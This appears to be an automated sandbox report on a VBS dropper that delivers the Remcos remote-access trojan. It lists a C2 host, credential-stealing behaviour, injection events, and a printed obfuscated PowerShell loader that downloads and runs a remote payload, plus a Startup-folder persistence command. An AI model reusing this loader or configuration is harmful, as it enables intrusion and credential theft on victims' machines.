Analysis
-
max time kernel
148s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
10-09-2022 11:44
Static task
static1
Behavioral task
behavioral1
Sample
c1d6fcea01ed82777e63ebc9e6f085ce.vbs
Resource
win7-20220812-en
General
-
Target
c1d6fcea01ed82777e63ebc9e6f085ce.vbs
-
Size
2KB
-
MD5
c1d6fcea01ed82777e63ebc9e6f085ce
-
SHA1
5497cee7b0f9b4f7f81491779e88edd83f167a15
-
SHA256
de7a6bf628cdb1265197ea78967808850230114acb014cd0a39aa36adf2832f7
-
SHA512
d1ea396de7dc2204733d113e2fed0d89b93c61cf7165ff9798a858712a81c4d9ad6a78eb0f75271f9df9e590d85c9e328ee9ce1348d01c66e0a446cda8d07611
Malware Config
Extracted
remcos
AUGB22
saptransmissions.dvrlists.com:55026
-
audio_folder
MicRecords
-
audio_path
%AppData%
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
install_path
%AppData%
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
AUGB22
-
keylog_path
%AppData%
-
mouse_option
false
-
mutex
AUGB22-JJZGN0
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
startup_value
Remcos
-
take_screenshot_option
false
-
take_screenshot_time
5
-
take_screenshot_title
wikipedia;solitaire;
Signatures
-
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule behavioral2/memory/4328-153-0x0000000000400000-0x0000000000457000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 2 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral2/memory/3788-155-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView behavioral2/memory/3788-156-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Nirsoft 4 IoCs
Processes:
resource yara_rule behavioral2/memory/4328-153-0x0000000000400000-0x0000000000457000-memory.dmp Nirsoft behavioral2/memory/2820-154-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/3788-155-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral2/memory/3788-156-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 30 4324 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation WScript.exe -
Loads dropped DLL 1 IoCs
Processes:
powershell.exepid process 4324 powershell.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts RegAsm.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
powershell.exeRegAsm.exedescription pid process target process PID 4324 set thread context of 3580 4324 powershell.exe RegAsm.exe PID 3580 set thread context of 3788 3580 RegAsm.exe RegAsm.exe PID 3580 set thread context of 4328 3580 RegAsm.exe RegAsm.exe PID 3580 set thread context of 2820 3580 RegAsm.exe RegAsm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30983451" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{C33F71ED-310E-11ED-AECB-C2DBB15B3A76} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\IESettingSync IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2548810005" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2548810005" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000883ed98174fc174d8e18111dae0d9120000000000200000000001066000000010000200000005b4fbf9eb3da4a1b564dd23c6427b332e4f24c6a10f3b3e4526955b995fc6fad000000000e800000000200002000000092a677b5a565acc1e4730a5a85ec9c944b302df9a47db7f1c4e33e953dba220d200000003d5a016bf6d02b634d11d8fa76a8d291d2bc8d5d45fb964ff261d8c16f334b834000000087b9ba508c7c8a57ce9d7eb84f32556570d7705b29f04627c5975bbc913f6e2cf732c3b136334817452d7126c03cdcb96fa7d27ee28f743443dfdb1750c37bd5 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30983451" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b0aa949b1bc5d801 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 5041bd9b1bc5d801 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000883ed98174fc174d8e18111dae0d912000000000020000000000106600000001000020000000cf9bda3231b0522e77f8c5303bff458ebf2c555caf2028fa528ff5fbed827e98000000000e800000000200002000000010f19245e337bd6f78fc64b66d53db87fa9112380d2290036f8b60e83d1d27462000000086c463a7b94b276f1790863c5718cb01f8206512c01da447ebbb14737d80797540000000067bc11c0baba1b150f1806f4d117cb78211f636ffdc7ea1cfac47b169e712b02ffccc88aee21748345fe59ef80fff54398ba000d5869e00bf670418c06b29bd iexplore.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
powershell.exepowershell.exeRegAsm.exeRegAsm.exepid process 4324 powershell.exe 3196 powershell.exe 4324 powershell.exe 3196 powershell.exe 4324 powershell.exe 4324 powershell.exe 3788 RegAsm.exe 3788 RegAsm.exe 2820 RegAsm.exe 2820 RegAsm.exe 3788 RegAsm.exe 3788 RegAsm.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
Processes:
RegAsm.exepid process 3580 RegAsm.exe 3580 RegAsm.exe 3580 RegAsm.exe 3580 RegAsm.exe -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
powershell.exepid process 3196 powershell.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
Processes:
powershell.exepowershell.exeRegAsm.exedescription pid process Token: SeDebugPrivilege 4324 powershell.exe Token: SeDebugPrivilege 3196 powershell.exe Token: SeIncreaseQuotaPrivilege 4324 powershell.exe Token: SeSecurityPrivilege 4324 powershell.exe Token: SeTakeOwnershipPrivilege 4324 powershell.exe Token: SeLoadDriverPrivilege 4324 powershell.exe Token: SeSystemProfilePrivilege 4324 powershell.exe Token: SeSystemtimePrivilege 4324 powershell.exe Token: SeProfSingleProcessPrivilege 4324 powershell.exe Token: SeIncBasePriorityPrivilege 4324 powershell.exe Token: SeCreatePagefilePrivilege 4324 powershell.exe Token: SeBackupPrivilege 4324 powershell.exe Token: SeRestorePrivilege 4324 powershell.exe Token: SeShutdownPrivilege 4324 powershell.exe Token: SeDebugPrivilege 4324 powershell.exe Token: SeSystemEnvironmentPrivilege 4324 powershell.exe Token: SeRemoteShutdownPrivilege 4324 powershell.exe Token: SeUndockPrivilege 4324 powershell.exe Token: SeManageVolumePrivilege 4324 powershell.exe Token: 33 4324 powershell.exe Token: 34 4324 powershell.exe Token: 35 4324 powershell.exe Token: 36 4324 powershell.exe Token: SeIncreaseQuotaPrivilege 4324 powershell.exe Token: SeSecurityPrivilege 4324 powershell.exe Token: SeTakeOwnershipPrivilege 4324 powershell.exe Token: SeLoadDriverPrivilege 4324 powershell.exe Token: SeSystemProfilePrivilege 4324 powershell.exe Token: SeSystemtimePrivilege 4324 powershell.exe Token: SeProfSingleProcessPrivilege 4324 powershell.exe Token: SeIncBasePriorityPrivilege 4324 powershell.exe Token: SeCreatePagefilePrivilege 4324 powershell.exe Token: SeBackupPrivilege 4324 powershell.exe Token: SeRestorePrivilege 4324 powershell.exe Token: SeShutdownPrivilege 4324 powershell.exe Token: SeDebugPrivilege 4324 powershell.exe Token: SeSystemEnvironmentPrivilege 4324 powershell.exe Token: SeRemoteShutdownPrivilege 4324 powershell.exe Token: SeUndockPrivilege 4324 powershell.exe Token: SeManageVolumePrivilege 4324 powershell.exe Token: 33 4324 powershell.exe Token: 34 4324 powershell.exe Token: 35 4324 powershell.exe Token: 36 4324 powershell.exe Token: SeDebugPrivilege 2820 RegAsm.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
iexplore.exepid process 4468 iexplore.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
iexplore.exeIEXPLORE.EXERegAsm.exepid process 4468 iexplore.exe 4468 iexplore.exe 2300 IEXPLORE.EXE 2300 IEXPLORE.EXE 3580 RegAsm.exe -
Suspicious use of WriteProcessMemory 37 IoCs
Processes:
iexplore.exeWScript.exepowershell.exeRegAsm.exedescription pid process target process PID 4468 wrote to memory of 2300 4468 iexplore.exe IEXPLORE.EXE PID 4468 wrote to memory of 2300 4468 iexplore.exe IEXPLORE.EXE PID 4468 wrote to memory of 2300 4468 iexplore.exe IEXPLORE.EXE PID 3204 wrote to memory of 4324 3204 WScript.exe powershell.exe PID 3204 wrote to memory of 4324 3204 WScript.exe powershell.exe PID 3204 wrote to memory of 3196 3204 WScript.exe powershell.exe PID 3204 wrote to memory of 3196 3204 WScript.exe powershell.exe PID 4324 wrote to memory of 3128 4324 powershell.exe RegAsm.exe PID 4324 wrote to memory of 3128 4324 powershell.exe RegAsm.exe PID 4324 wrote to memory of 3128 4324 powershell.exe RegAsm.exe PID 4324 wrote to memory of 3580 4324 powershell.exe RegAsm.exe PID 4324 wrote to memory of 3580 4324 powershell.exe RegAsm.exe PID 4324 wrote to memory of 3580 4324 powershell.exe RegAsm.exe PID 4324 wrote to memory of 3580 4324 powershell.exe RegAsm.exe PID 4324 wrote to memory of 3580 4324 powershell.exe RegAsm.exe PID 4324 wrote to memory of 3580 4324 powershell.exe RegAsm.exe PID 4324 wrote to memory of 3580 4324 powershell.exe RegAsm.exe PID 4324 wrote to memory of 3580 4324 powershell.exe RegAsm.exe PID 4324 wrote to memory of 3580 4324 powershell.exe RegAsm.exe PID 4324 wrote to memory of 3580 4324 powershell.exe RegAsm.exe PID 4324 wrote to memory of 3580 4324 powershell.exe RegAsm.exe PID 4324 wrote to memory of 3580 4324 powershell.exe RegAsm.exe PID 3580 wrote to memory of 492 3580 RegAsm.exe RegAsm.exe PID 3580 wrote to memory of 492 3580 RegAsm.exe RegAsm.exe PID 3580 wrote to memory of 492 3580 RegAsm.exe RegAsm.exe PID 3580 wrote to memory of 3788 3580 RegAsm.exe RegAsm.exe PID 3580 wrote to memory of 3788 3580 RegAsm.exe RegAsm.exe PID 3580 wrote to memory of 3788 3580 RegAsm.exe RegAsm.exe PID 3580 wrote to memory of 3788 3580 RegAsm.exe RegAsm.exe PID 3580 wrote to memory of 4328 3580 RegAsm.exe RegAsm.exe PID 3580 wrote to memory of 4328 3580 RegAsm.exe RegAsm.exe PID 3580 wrote to memory of 4328 3580 RegAsm.exe RegAsm.exe PID 3580 wrote to memory of 4328 3580 RegAsm.exe RegAsm.exe PID 3580 wrote to memory of 2820 3580 RegAsm.exe RegAsm.exe PID 3580 wrote to memory of 2820 3580 RegAsm.exe RegAsm.exe PID 3580 wrote to memory of 2820 3580 RegAsm.exe RegAsm.exe PID 3580 wrote to memory of 2820 3580 RegAsm.exe RegAsm.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c1d6fcea01ed82777e63ebc9e6f085ce.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3204 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,00110001,00111001,00110010,00101110,00110010,00110001,00110000,00101110,00110010,00110100,00110000,00101110,00110001,00110000,00110001,00101111,01010110,01101001,01110011,01100001,00101111,01010000,01100001,01111001,01100001,01100010,01101100,01100101,01110011,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };$o00='I' + 'EX';sal P $o00;([system.String]::Join('', $gf))|P2⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4324 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:3128
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3580 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\rzmxuranonfricmdru"4⤵PID:492
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\rzmxuranonfricmdru"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3788
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\cbspvjlhcwxesqihjeogx"4⤵
- Accesses Microsoft Outlook accounts
PID:4328
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\evxawbwiyepjvwxlspahiijv"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2820
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\Admin\AppData\Local\Temp\c1d6fcea01ed82777e63ebc9e6f085ce.vbs' -Destination 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c1d6fcea01ed82777e63ebc9e6f085ce.vbs'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
PID:3196
-
-
C:\Program Files (x86)\Internet Explorer\ielowutil.exe"C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding1⤵PID:4852
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4468 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4468 CREDAT:17410 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2300
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
1KB
MD566b4a80f1b0588c784539ea6dec3eaa9
SHA12ea8813d84065ebc0e369dd71657b58c5913b181
SHA2569d88259ba2d167100b8a8cba6725b04fc6ed6c212e739fc1dedff490bb416197
SHA51288731f658558df0d287b31f48501ff34905ce6d968d1b43a1924e4f1fa60fc2afe846c6c3e2f27f898c33ab6c6128c1df6d01051feae1a365f7e4080aa8e6937
-
Filesize
75KB
MD542b2c266e49a3acd346b91e3b0e638c0
SHA12bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1
SHA256adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29
SHA512770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81
-
Filesize
4KB
MD5d06ebab8b0513f602e535079a9ebbeea
SHA1d29472e6eb5a72f0353d70b97a33337b255b487e
SHA2560c9e16830ccc6495def187adde2137ac07a566e1534e5714f626dcd68d28094c
SHA512002df6f401950fd24d5976a47c58e9e2c58cef7d4fdec69f815fb6a00fb1e1a8963a4a7bf52056e61d6f6875edec393c466742c3031dd5f88802b45ddadca209